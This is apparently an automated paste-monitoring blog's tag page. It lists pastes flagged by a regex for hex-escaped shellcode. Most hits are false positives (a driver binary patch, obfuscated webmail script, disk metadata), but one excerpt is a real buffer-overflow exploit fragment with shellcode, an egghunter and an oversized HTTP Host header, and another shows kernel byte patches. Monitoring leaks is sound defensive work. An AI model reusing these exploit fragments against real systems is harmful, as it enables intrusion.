LeakedIn Logo
Stories About Data Leaks and Related Stuff

Posts Tagged ‘Shellcode’

« Older Entries

Potential leak of data: Shellcode

Posted by PasteMon on May 16th, 2013

0 votedvote

Detected 2 occurrence(s) of ‘\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}’: 

sudo perl -pi -e '$c+=s/\x8b\x81\x1c\x0c\x00\x00\xeb\x06\x8b\x81\x20\x0c\x00\x00/\xb8\x02\x00\x00\x00\x90\xeb\x06\xb8\x00\x00\x00\x00\x90/; END { printf "%s: %d substitution%s made.\n",($c==1 ? "Success" : "Error"),$c,(!$c || $c>1 ? "s" : ""); $?=($c!=1); }' /System/Library/Extensions/GeForceGLDriverWeb.bundle/Contents/MacOS/libclh.dylib

Source: http://pastebin.com/raw.php?i=N4n7Ub0Q

Potential leak of data: Shellcode

Posted by PasteMon on May 16th, 2013

0 votedvote

Detected 4 occurrence(s) of ‘\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}’: 

ion/mailclient/mailcom/resource/mailclient/widgets/blue/common/loading_animation_en-3447255655.gif"/\x3E\x3C/center\x3E',
      seuri:'\x31\x36\x31\x39\x30\x37\x35\x35\x37\x32\x36\x38\x37\x37\x38\x7C\x2D\x6C\x39\x43\x5F\x68\x46\x48\x36\x55\x63\x52\x79\x76\x6B\x64\x6E\x42\x64\x6E\x6D\x53\x6D\x42\x58\x69\x77',
      erMes:function(what){
        var a,c,d,e,f,r;
        a=what.split('{');r={};for(x=0;x<a.length;x++){c=a[x].replace(/{|}|"|\n/gi,'').split(',');if(c!=''&&c!=' '){for(y=0;y<c.length;y++){d=c[y].split(':');if(d!=''&&d!=' '){for(z=0;z

Source: http://pastebin.com/raw.php?i=KG94M4n9

Potential leak of data: Shellcode

Posted by PasteMon on May 15th, 2013

0 votedvote

Detected 1 occurrence(s) of ‘\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}’: 

: 6px;
		border: 1px inset;
		width: 640px;
		height: 194px;
		text-align: left;
		overflow: auto">memcpy( (void*)0xx, (void*)&quot;\x5A\xFB\xFF\xFF&quot;, 4 );
		memcpy( (void*)0xx, (void*)&quot;\x05&quot;, 1 ); 
		memcpy( (void*)0xx, (void*)&quot;\xD8\x0F\x22\xD8\xC3\x0F\x20\xE0\x25\x7F\xFF\xFF\xFF\x0F\x22\xE0\x0D\x80&quot;, 18 );  
		memcpy( (void*)0xx, (void*)&quot;\xC3&quot;, 1 );  
		memcpy( (void*)0xx, (void*)&quot;\xC3&quot;, 1 );  //RtlPrefetchMemoryNonTemporal
		memcpy( (void*)0xx, (void*)&quot;\xBE\x6F\x00\x00&quot;, 4 );

Source: http://pastebin.com/raw.php?i=Ni63Etqs

Potential leak of data: Shellcode

Posted by PasteMon on May 15th, 2013

0 votedvote

Detected 62 occurrence(s) of ‘\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}’: 

4"
"\x48\x6c\x47\x77\x6d\x53\x50\x79\x6f\x69\x45\x6f\x4b\x48\x70"
"\x4c\x75\x4f\x52\x63\x66\x32\x48\x6f\x56\x6c\x55\x6d\x6d\x6d"
"\x4d\x69\x6f\x39\x45\x65\x6c\x57\x76\x63\x4c\x47\x7a\x4d\x50"
"\x4b\x4b\x69\x70\x61\x65\x76\x65\x6d\x6b\x62\x67\x64\x53\x62"
"\x52\x62\x4f\x71\x7a\x55\x50\x52\x73\x39\x6f\x58\x55\x41\x41")


evilcrash = "\x4c"*3379 + "\x77\x21\x6e\x6c\x35\x6d"+ "G"*32 +egghunter + "A"*100 + ":7510"
buffer="GET /topology/homeBaseView HTTP/1.1\r\n"
buffer+="Host: "+evilcrash + "\r\n"
buffer+="Content-Type: application/x-www-form-urlencod

Source: http://pastie.org/pastes/7911603/download

Potential leak of data: Shellcode

Posted by PasteMon on May 15th, 2013

0 votedvote

Detected 2 occurrence(s) of ‘\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}’: 

t4
  E: ID_FS_USAGE=filesystem
  E: ID_FS_UUID=7e8cae70-d536-4b7c-afca-28f4e7be65d2
  E: ID_FS_UUID_ENC=7e8cae70-d536-4b7c-afca-28f4e7be65d2
  E: ID_FS_VERSION=1.0
  E: ID_MODEL=SanDisk_SSD_U100_128GB
  E: ID_MODEL_ENC=SanDisk\x20SSD\x20U100\x20128GB\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
  E: ID_PART_ENTRY_DISK=8:0
  E: ID_PART_ENTRY_NUMBER=1
  E: ID_PART_ENTRY_OFFSET=2048
  E: ID_PART_ENTRY_SCHEME=dos
  E: ID_PART_ENTRY_SIZE=250066944
  E: ID_PART_ENTRY_TYPE=0x83
  E: ID_PART_TABLE_TYPE=dos
  E: ID

Source: http://pastebin.com/raw.php?i=WqqWdXB3

« Older Entries